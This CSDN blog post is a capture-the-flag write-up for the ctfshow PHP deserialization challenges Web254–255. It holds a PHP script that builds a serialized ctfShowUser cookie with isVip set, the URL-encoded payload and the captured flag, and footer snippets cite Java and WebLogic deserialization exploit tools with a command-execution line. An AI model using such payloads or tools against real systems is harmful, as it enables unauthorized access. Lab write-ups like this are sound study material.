ctfshow 反序列化Web254-255

已于 2022-04-21 16:22:33 修改
阅读量2.2k 收藏 1
点赞数 1
文章标签: web安全
于 2022-04-21 11:35:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/124317484
版权

2022/4/17

反序列化

反序列化漏洞的产生主要有以下两个原因:

1. unserialize 函数的参数可控。
2.存在魔法函数。

魔法函数

__construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debuginfo等成员函数在PHP中被称为魔法函数。在命名自己的类方法时不能使用这些名称,除非是想使用其魔法函数的功能。

Web254

Playload:

?username=xxxxxx&password=xxxxxx

 

Web255

写一个php文件输出user序列化后的cookie

把题目粘贴到php文件把$isVip的值设置为ture

class ctfShowUser{

    public $username='xxxxxx';

    public $password='xxxxxx';

    public $isVip=ture;



    public function checkVip(){

        return $this->isVip;

    }

    public function login($u,$p){

        return $this->username===$u&&$this->password===$p;

    }

    public function vipOneKeyGetFlag(){

        if($this->isVip){

            global $flag;

            echo "your flag is ".$flag;

        }else{

            echo "no vip, no flag";

        }

    }

}



echo urlencode (serialize (new ctfShowUser()));

//ctfshow反序列化漏洞web255

?>

 访问发现:

 O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bs%3A4%3A%22ture%22%3B%7D

把这个值填入名为user的cookie

再把xxxxxx传入username和password

执行得到flag:

ctfshow{c0736abc-d51d-4ea5-8e88-c655dbfe5dea}

墨言ink
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
grpc-web-error-details:在grpc-web反序列化`grpc-status-details-bin`元数据的实用程序功能
05-15
使用时反序列化grpc-web-details-bin元数据值的实用程序功能。 动机 。 由错误状态代码和可选的字符串错误消息组成的标准错误模型是“官方” gRPC错误模型。 如果您使用的是协议缓冲区,则还可以使用Google开发和...
CTFshow 反序列化 web254
Kradress的博客
12-19 242
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
ctfshow——web入门 SSRF
m0_74093152的博客
06-04 704
通过hackbar post提交获得flag。
CTFshow刷题日记 web 反序列化 web254-255
m0_73700261的博客
05-09 258
这个是源代码,这里的思路是这样的有两个get一个是username另一个是password,第一个if是检查是否有两个变量,接着就新建一个ctfShowUser的类,接着第二个if是一个$user->login($username,$password)对应上面的login($u,$p) 接着进入第三个if($user-checkVip())这里就进入到了$user->vipOneKeyGetFlag。cookie传入一个O:11:"ctfShowUser":1:{s:5:"isVip";
ctfshow web255 web 256 web257
姜小孩的博客
07-02 1300
目录web255web256附代码 整体的思路和上一题差不多只是多了一句 可以看到unserialize就是反序列化,所以需要我们序列化一些东西,通过cookie的user变量传入,改变这个数据。 这段代码无法让isVip为true,所以我们就需要通过user这个变量改变isVip的值。直接把类拿过来,只有类和变量会被反序列化,其他都可以去掉。 所以参入参数就是拿到flag,债见!!附代码 ​ 这个题的关键点在于username和password不相等,因为都是强比较,所以我们传入
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 2523
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
ctfshow web入门反序列化 web254-257
m0_62207170的博客
04-21 544
ctfshow web入门反序列化 web254-257
ctfshow web反序列化(254-261)
m0_62274649的博客
12-15 315
终于又开始做反序列化这一部分的题,希望做完这些题,能对反序列化这一块有更深的理解。
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
weblogic180417反序列化补丁--p27395085_1036_Generic
07-05
weblogic180417反序列化补丁--p27395085_1036_Generic 里面附带wls1036_upgrade_generic.jar Linux Weblogic 10.3.6
ctfshow—web入门—php反序列化
m0_74013288的博客
11-12 489
虽然序列化时会调用sleep()函数,给username和password赋值为空,但是反序列化时会进入__unserialize中,在最后进行反序列化的时候又会重现赋值,所以可以不用管这个函数,,,invoke函数也没有调用,所以不用管。分析代码,发现需要使ctfShowUser这个类里面的username和password不一样,因为是序列化,对象的属性(变量)和构造方法内的变量赋值我们是可控的,所以我们将username和password改成不一样的就行。查看页面源代码,可以找到我们反序列化的入口;
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1096
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
CTFshow——web入门——反序列化web254-web278 详细Writeup
Leaf_initial的博客
08-24 1892
在做题之前先简要总结一下知识点。
ctf.show反序列化(web254-web278)
wanan的博客
08-31 4170
ctf.show反序列化(web254-web278)
在IIS上发布后出现: 编译器失败,错误代码为 255
qq_42988836的博客
03-02 1786
这里写自定义目录标题 自动昨天win10更新后,编写的ASP.net 程序发布到服务端后提示编译失败。 具体错误如下: 花了大半天的时间也没找到具体错误原因,不过基本可以确定是犹豫windows系统更新引起的。但是我把更新都卸载后 依旧没能解决问题。 后面上外网查找了一番,根据他人的经验删除了web.config 里 compilers 节点,及节点下的文本。问题得以解决。 <compilers> <compiler language="c#;cs;csharp" e
web254
姜小孩的博客
06-29 209
附代码: 这道题很简单,大概思路就是让你Get传参一个username和password,下面的if是检查是否为空,不为空就调用ctfShowUser里面的login方法,传入的username变成了$u,传入的password变成了$p。下面的if就是在判断isVip是否为ture,可以看到一开始这里的的isVip是false的,所以如果username和password的值和ctfShowUser里面的username和password的值分别相同,那么就让isVip变成Ture,我们就可
基于拓扑漏洞分析的网络安全态势感知模型
最新发布
attack2001的专栏
06-07 584
漏洞态势分析是指通过获取网络系统中的漏洞信息、拓扑信息、攻击信息等,分析网络资产可能遭受的安全威胁以及预测攻击者利用漏洞可能发动的攻击,构建拓扑漏洞图,展示网络中可能存在的薄弱环节,以此来评估网络安全状态。在网络安全形势日益恶化的今天,如何快速有效地获取网络系统的安全状况、提高网络安全应对水平、增大网络安全的预警时间,成为网络空间安全领域研究的重要问题。网络漏洞态势感知研究存在的问题是缺乏有效的网络漏洞势数据采集和要素提取方法,使得网络资产漏洞态势的理解和分析计算难以进行。
ctfshow反序列化
09-09
引用中的代码展示了一个类`ctfshow`,其中包含了一个`__destruct`方法,该方法在对象被销毁时会输出一个变量`$flag`的值。该类的序列化结果被输出并展示了如何利用`__destruct`方法来获取`$flag`的值。 引用中的代码展示了另一个类`ctfshowvip`,其中`password`属性被设置为包含恶意代码的字符串,利用`__destruct`方法中的弱比较漏洞,可以构造一个恶意的序列化payload来执行任意代码。 引用中的代码展示了一个修改后的类`ctfShowUser`,其中通过构造函数将`isVip`属性设置为`true`。通过构造一个链式调用,可以构造一个序列化的payload来实现`$this->isVip`值为`true`的反序列化攻击。 综上所述,ctfshow的反序列化攻击可以通过构造恶意的序列化payload来利用`__destruct`方法或弱比较漏洞来执行任意代码或获取敏感信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值